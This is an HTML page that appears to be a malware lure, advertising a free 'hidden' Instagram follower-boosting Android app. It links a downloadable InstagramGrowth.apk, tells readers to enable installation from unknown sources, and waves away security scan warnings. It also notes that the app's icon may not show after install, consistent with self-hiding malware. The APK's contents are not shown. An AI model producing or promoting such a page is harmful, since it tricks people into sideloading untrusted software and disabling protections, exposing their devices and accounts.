<html>
<head>
<Title>Best App For Instagram Growth (Hidden Concept)</Title>
<style>
body {
  margin: 0;
  padding: 0;
}
<!----       NAV                ---->
.topnav {
  overflow: hidden;
  background-color: #333;
}

.topnav a {
  float: left;
  color: #f2f2f2;
  text-align: center;
  padding: 35px 45px;
  text-decoration: none;
  font-size: 17px;
}

.topnav a:hover {
  background-color: #ddd;
  color: black;
}

.topnav a.active {
  background-color: #04AA6D;
  color: white;
}

<!----       NAV  CLOSE             ---->

h1{
   font-family: 'Georama', sans-serif;
}
h2{
   font-family: 'Georama', sans-serif;
}
a{
   text-decoration:none;
}
.button1{
  border: none;
  color: Blue;
  padding: 30px 40px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 30px
}
</style>
</head>

<!----       NAV                ---->

<body>
<div class="topnav">
  <a class="active" href="#home">Home</a>
  <a href="#news">News</a>
  <a href="#contact">Contact</a>
  <a href="#about">About</a>
</div>

<div style="padding-left:16px">
  <h2>Top Navigation Example</h2>
</div>

<!----       BODY             ---->
<br><br>
<body bgcolor = "black">
<center>
<font color = "White"><h1>Download The Best App For Boosting Your Instagram Profile Like a Pro! (Hidden Application)</h1></font><br><br>
<button class="button1"><a href = "InstagramGrowth.apk" download> Download Here </a><br></button>
</center>
<font color = "White"><br><br><br><br>
<dic class = "Article">
<h2>What is InstagramGrowth?<br></h2>
<p>InstagramGrowth is an android application which helps you gain followers, likes, views, for totally free! It Has a Graphical Interface
Helps You Gain Reach More Faster & Easier</p><br>
<h2>How it works??<br></h2>
<p>It's Very easier to use this application, All you have to do is, just Follow some users Or like others posts
Through this app, By doing this you'll get Points Which you have to use to bee in the top list so others who all
are also using this application can follow you, it's pretty simple!</p>
<h2>Installation?<br></h2><br>
<p>Now the installation process is also a bit easy, just download the .apk file from the link
which is mentioned above, now install it. Now if you face any problem during installation, Make sure you
enabled the setting "Allow From Unknown Sources" to move further... Then, In some Operating Systems, It shows you the
option to scan the app, No worries My friend! It's totally safe and secure, if you don't trust us,
you can obviously send it for a scan, NOT A SINGLE PROBLEM! :) Now InstagramGrowth Application is now installed on your mobile,
May be it doesn't show the logo for the first time, but after you open the application, it will the refresh that, (Sorry 
for this bug) Now Get Reach And Enjoy :) </p>
<br>
</div>
</body>
</html>
